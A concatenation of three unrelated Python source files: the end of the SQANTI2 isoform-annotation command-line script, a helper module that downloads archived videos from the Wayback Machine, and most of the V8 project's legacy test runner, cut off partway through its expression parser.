print("ERROR running command: {0}".format(cmd), file=sys.stderr)
sys.exit(-1)
def main():
global utilitiesPath
#arguments
parser = argparse.ArgumentParser(description="Structural and Quality Annotation of Novel Transcript Isoforms")
parser.add_argument('isoforms', help='\tIsoforms (FASTA/FASTQ or gtf format; By default "FASTA/FASTQ". For GTF, use --gtf')
parser.add_argument('annotation', help='\t\tReference annotation file (GTF format)')
parser.add_argument('genome', help='\t\tReference genome (Fasta format)')
parser.add_argument("--min_ref_len", type=int, default=200, help="\t\tMinimum reference transcript length (default: 200 bp)")
parser.add_argument("--force_id_ignore", action="store_true", default=False, help=argparse.SUPPRESS)
parser.add_argument("--aligner_choice", choices=['minimap2', 'deSALT', 'gmap'], default='minimap2')
parser.add_argument('--cage_peak', help='\t\tFANTOM5 Cage Peak (BED format, optional)')
parser.add_argument("--polyA_motif_list", help="\t\tRanked list of polyA motifs (text, optional)")
parser.add_argument("--polyA_peak", help='\t\tPolyA Peak (BED format, optional)')
parser.add_argument("--phyloP_bed", help="\t\tPhyloP BED for conservation score (BED, optional)")
parser.add_argument("--skipORF", default=False, action="store_true", help="\t\tSkip ORF prediction (to save time)")
parser.add_argument("--is_fusion", default=False, action="store_true", help="\t\tInput are fusion isoforms, must supply GTF as input using --gtf")
parser.add_argument('-g', '--gtf', help='\t\tUse when running SQANTI by using as input a gtf of isoforms', action='store_true')
parser.add_argument('-e','--expression', help='\t\tExpression matrix (supported: Kallisto tsv)', required=False)
parser.add_argument('-x','--gmap_index', help='\t\tPath and prefix of the reference index created by gmap_build. Mandatory if using GMAP unless -g option is specified.')
parser.add_argument('-t', '--cpus', default=10, type=int, help='\t\tNumber of threads used during alignment by aligners. (default: 10)')
parser.add_argument('-n', '--chunks', default=1, type=int, help='\t\tNumber of chunks to split SQANTI2 analysis in for speed up (default: 1).')
#parser.add_argument('-z', '--sense', help='\t\tOption that helps aligners know that the exons in you cDNA sequences are in the correct sense. Applicable just when you have a high quality set of cDNA sequences', required=False, action='store_true')
parser.add_argument('-o','--output', help='\t\tPrefix for output files.', required=False)
parser.add_argument('-d','--dir', help='\t\tDirectory for output files. Default: Directory where the script was run.', required=False)
parser.add_argument('-c','--coverage', help='\t\tJunction coverage files (provide a single file or a file pattern, ex: "mydir/*.junctions").', required=False)
parser.add_argument('-s','--sites', default="ATAC,GCAG,GTAG", help='\t\tSet of splice sites to be considered as canonical (comma-separated list of splice sites). Default: GTAG,GCAG,ATAC.', required=False)
parser.add_argument('-w','--window', default="20", help='\t\tSize of the window in the genomic DNA screened for Adenine content downstream of TTS', required=False, type=int)
parser.add_argument('--geneid', help='\t\tUse gene_id tag from GTF to define genes. Default: gene_name used to define genes', default=False, action='store_true')
parser.add_argument('-fl', '--fl_count', help='\t\tFull-length PacBio abundance file', required=False)
parser.add_argument("-v", "--version", help="Display program version number.", action='version', version='SQANTI2 '+str(__version__))
parser.add_argument("--skip_report", action="store_true", default=False, help=argparse.SUPPRESS)
args = parser.parse_args()
if args.is_fusion:
print("WARNING: Currently if --is_fusion is used, no ORFs will be predicted.", file=sys.stderr)
args.skipORF = True
if not args.gtf:
print("ERROR: if --is_fusion is on, must supply GTF as input and use --gtf!", file=sys.stderr)
sys.exit(-1)
if args.expression is not None:
if not os.path.exists(args.expression):
print("Expression file {0} not found. Abort!".format(args.expression), file=sys.stderr)
sys.exit(-1)
# path and prefix for output files
if args.output is None:
args.output = os.path.splitext(os.path.basename(args.isoforms))[0]
if args.dir is None:
args.dir = os.getcwd()
else:
args.dir = os.path.abspath(args.dir)
if os.path.isdir(args.dir):
print("WARNING: output directory {0} already exists. Overwriting!".format(args.dir), file=sys.stderr)
else:
os.makedirs(args.dir)
args.genome = os.path.abspath(args.genome)
if not os.path.isfile(args.genome):
print("ERROR: genome fasta {0} doesn't exist. Abort!".format(args.genome), file=sys.stderr)
sys.exit()
args.isoforms = os.path.abspath(args.isoforms)
if not os.path.isfile(args.isoforms):
print("ERROR: Input isoforms {0} doesn't exist. Abort!".format(args.isoforms), file=sys.stderr)
sys.exit()
if not args.gtf:
if args.aligner_choice == 'gmap':
if not os.path.isdir(os.path.abspath(args.gmap_index)):
print("GMAP index {0} doesn't exist! Abort.".format(args.gmap_index), file=sys.stderr)
sys.exit()
elif args.aligner_choice == 'deSALT':
if not os.path.isdir(os.path.abspath(args.gmap_index)):
print("deSALT index {0} doesn't exist! Abort.".format(args.gmap_index), file=sys.stderr)
sys.exit()
print("Cleaning up isoform IDs...", file=sys.stderr)
args.isoforms = rename_isoform_seqids(args.isoforms, args.force_id_ignore)
print("Cleaned up isoform fasta file written to: {0}".format(args.isoforms), file=sys.stderr)
args.annotation = os.path.abspath(args.annotation)
if not os.path.isfile(args.annotation):
print("ERROR: Annotation doesn't exist. Abort!".format(args.annotation), file=sys.stderr)
sys.exit()
#if args.aligner_choice == "gmap":
# args.sense = "sense_force" if args.sense else "auto"
#elif args.aligner_choice == "minimap2":
# args.sense = "f" if args.sense else "b"
## (Liz) turned off option for --sense, always TRUE
if args.aligner_choice == "gmap":
args.sense = "sense_force"
elif args.aligner_choice == "minimap2":
args.sense = "f"
#elif args.aligner_choice == "deSALT": #deSALT does not support this yet
# args.sense = "--trans-strand"
args.novel_gene_prefix = None
# Print out parameters so can be put into report PDF later
args.doc = os.path.join(os.path.abspath(args.dir), args.output+".params.txt")
print("Write arguments to {0}...".format(args.doc, file=sys.stdout))
with open(args.doc, 'w') as f:
f.write("Version\t" + __version__ + "\n")
f.write("Input\t" + os.path.basename(args.isoforms) + "\n")
f.write("Annotation\t" + os.path.basename(args.annotation) + "\n")
f.write("Genome\t" + os.path.basename(args.genome) + "\n")
f.write("Aligner\t" + args.aligner_choice + "\n")
f.write("FLCount\t" + (os.path.basename(args.fl_count) if args.fl_count is not None else "NA") + "\n")
f.write("Expression\t" + (os.path.basename(args.expression) if args.expression is not None else "NA") + "\n")
f.write("Junction\t" + (os.path.basename(args.coverage) if args.coverage is not None else "NA") + "\n")
f.write("CagePeak\t" + (os.path.basename(args.cage_peak) if args.cage_peak is not None else "NA") + "\n")
f.write("PolyA\t" + (os.path.basename(args.polyA_motif_list) if args.polyA_motif_list is not None else "NA") + "\n")
f.write("PolyAPeak\t" + (os.path.basename(args.polyA_peak) if args.polyA_peak is not None else "NA") + "\n")
f.write("IsFusion\t" + str(args.is_fusion) + "\n")
# Running functionality
print("**** Running SQANTI2...", file=sys.stdout)
if args.chunks == 1:
run(args)
else:
split_dirs = split_input_run(args)
combine_split_runs(args, split_dirs)
shutil.rmtree(SPLIT_ROOT_DIR)
if __name__ == "__main__":
main()
|
helpers.py
|
import re
import os
import urllib
import requests
from threading import Thread
canUseBS4 = True
valid_chars = '_.() abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&-+='
try:
from bs4 import BeautifulSoup
except ImportError as e:
canUseBS4 = False
# This function was written by NT_x86
def threadline(list,numthreads,function):
threadlists = {}
#make lists
for x in range(numthreads):
threadlists["thread"+str(x)] = []
thrdnum = 0
#append all the lines to lists
for line in list:
threadlists["thread"+str(thrdnum)].append(line)
if thrdnum == numthreads-1:
thrdnum = 0
else:
thrdnum = thrdnum+1
#run the threads
for x in range(numthreads):
Thread(target=function, args=(threadlists["thread"+str(x)], )).start()
# Make a directory
def makeDir(dir):
if not os.path.exists(dir):
os.mkdir(dir)
# Filter file names
def getfilteredname(name):
fname = ''.join(c for c in name if c in valid_chars)
return fname
# Download a video
def downloadVideo(html, vidName, rootPath):
# Make paths
makeDir(f"{rootPath}\\Success")
makeDir(f"{rootPath}\\Failed")
makeDir(f"{rootPath}\\Videos")
soup = BeautifulSoup(html, features='html.parser')
vidTitle = soup.find("div", {"id": "video-title"})
vidName = f"{rootPath}\\Videos\\{vidName}.flv" if not vidTitle else f"{rootPath}\\Videos\\{getfilteredname(f'{vidName}-{vidTitle.getText()}')}.flv"
mobj = re.search(r"(?i)videoUrl\\x3d(.+?)\\x26", html)
if mobj is None:
print("FAILED TO FIND VIDEO")
else:
mediaURL = urllib.parse.unquote(mobj.group(1))
mediaURL = mediaURL.replace('\\x3d', '\x3d')
mediaURL = mediaURL.replace('\\x26', '\x26')
req = requests.get(f"http://web.archive.org/web/201208im_/{mediaURL}", allow_redirects=True)
URL = req.url + "\n"
if not URL in open(f"{rootPath}\Success\\Success.txt", "a+").read():
if req.status_code == 200:
print(f"Successfully downloaded {vidName}")
with open(f"{rootPath}\\Success\\Success.txt", "a+") as good:
good.write(URL)
with open(vidName, "wb+") as video:
video.write(req.content)
return True
else:
print(f"Failed to download {vidName} becasue: {req.status_code}")
if not URL in open(f"{rootPath}\\Failed\\{req.status_code}.txt", "w+").read():
with open(f"{rootPath}\\Failed\\{req.status_code}.txt", "a+") as stcode:
stcode.write(URL)
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import optparse
import os
from os.path import join, dirname, abspath, basename, isdir, exists
import platform
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
import utils
from Queue import Queue, Empty
VERBOSE = False
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases):
self.cases = cases
self.queue = Queue(len(cases))
for case in cases:
self.queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.crashed = 0
self.terminate = False
self.lock = threading.Lock()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[])
threads.append(thread)
thread.start()
try:
self.RunSingle()
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.terminate = True
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self):
while not self.terminate:
try:
test = self.queue.get_nowait()
except Empty:
return
case = test.case
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = time.time()
output = case.Run()
case.duration = (time.time() - start)
except BreakNowException:
self.terminate = True
except IOError, e:
assert self.terminate
return
if self.terminate:
return
self.lock.acquire()
if output.UnexpectedOutput():
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces and double quotes. We may need to escape more characters
# for this to work properly.
parts.append('"%s"' % part.replace('"', '\\"'))
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- CRASHED ---"
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, templates):
super(CompactProgressIndicator, self).__init__(cases)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- CRASHED ---"
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
}
super(MonochromeProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'mono': MonochromeProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class BreakNowException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, mode):
self.path = path
self.context = context
self.duration = None
self.mode = mode
def IsNegative(self):
return False
def TestsIsolates(self):
return False
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self, self.mode))
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def GetCustomFlags(self, mode):
return None
def Run(self):
self.BeforeRun()
result = None
try:
result = self.RunCommand(self.GetCommand())
except:
self.terminate = True
raise BreakNowException("User pressed CTRL+C or IO went wrong")
finally:
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasPreciousOutput(self):
return self.UnexpectedOutput() and self.store_unexpected_output
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0 and \
self.output.exit_code != -signal.SIGABRT
def HasTimedOut(self):
return self.output.timed_out
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal.SIGTERM)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode)
except ImportError:
pass
return prev_error_mode
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
prev_error_mode = SEM_INVALID_VALUE
if utils.IsWindows():
popen_args = subprocess.list2cmdline(args)
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX
prev_error_mode = Win32SetErrorMode(error_mode)
Win32SetErrorMode(error_mode | prev_error_mode)
process = subprocess.Popen(
shell = utils.IsWindows(),
args = popen_args,
**rest
)
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
# On Windows, when run with -jN in parallel processes,
# OS often fails to unlink the temp file. Not sure why.
# Need to retry.
# Idea from https://bugs.webkit.org/attachment.cgi?id=75982&action=prettypatch
retry_count = 0
while retry_count < 30:
try:
os.unlink(name)
return
except OSError, e:
retry_count += 1
time.sleep(retry_count * 0.1)
PrintError("os.unlink() " + str(e))
def Execute(args, context, timeout=None):
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
stdout = fd_out,
stderr = fd_err,
)
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def ExecuteNoCapture(args, context, timeout=None):
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
)
return CommandOutput(exit_code, False, "", "")
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[],
['--stress-opt', '--always-opt'],
['--nocrankshaft']]
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(file[i]):
return False
return True
def GetTestStatus(self, sections, defs):
pass
def VariantFlags(self):
return VARIANT_FLAGS
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def DownloadData(self, context):
config = self.GetConfiguration(context)
if 'DownloadData' in dir(config):
config.DownloadData()
def AddTestsToList(self, result, current_path, path, context, mode):
config = self.GetConfiguration(context)
for v in config.VariantFlags():
tests = config.ListTests(current_path, path, mode, v)
for t in tests: t.variant_flags = v
result += tests
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def DownloadData(self, path, context):
(name, rest) = CarCdr(path)
for test in self.tests:
if not name or name.match(test.GetName()):
test.DownloadData(context)
def ListTests(self, current_path, path, context, mode, variant_flags):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, mode)
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
SUFFIX = {
'debug' : '_g',
'release' : '' }
FLAGS = {
'debug' : ['--nobreak-on-abort', '--nodead-code-elimination',
'--enable-slow-asserts', '--debug-code', '--verify-heap'],
'release' : ['--nobreak-on-abort', '--nodead-code-elimination']}
TIMEOUT_SCALEFACTOR = {
'debug' : 4,
'release' : 1 }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, timeout, processor, suppress_dialogs, store_unexpected_output):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.vm_root = vm
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
def GetVm(self, mode):
name = self.vm_root + SUFFIX[mode]
if utils.IsWindows() and not name.endswith('.exe'):
name = name + '.exe'
return name
def GetVmCommand(self, testcase, mode):
return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode)
def GetVmFlags(self, testcase, mode):
flags = testcase.GetCustomFlags(mode)
if flags is None:
flags = FLAGS[mode]
return testcase.variant_flags + flags
def GetTimeout(self, testcase, mode):
result = self.timeout * TIMEOUT_SCALEFACTOR[mode]
if '--stress-opt' in self.GetVmFlags(testcase, mode):
return result * 4
else:
return result
def RunTestCases(cases_to_run, progress, tasks):
progress = PROGRESS_INDICATORS[progress](cases_to_run)
result = 0
try:
result = progress.Run(tasks)
except Exception, e:
print "\n", e
return result
def BuildRequirements(context, requirements, mode, scons_flags):
command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)]
+ requirements
+ scons_flags)
output = ExecuteNoCapture(command_line, context)
return output.exit_code == 0
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
def Evaluate(self, env, defs):
return env[self.name]
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Everything(Set):
def Intersect(self, that):
return that
def Union(self, that):
return self
def IsEmpty(self):
return False
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
elif self.op == '!=':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
elif self.Current(2) == '!=':
self.AddToken('!=')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==', '!=']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
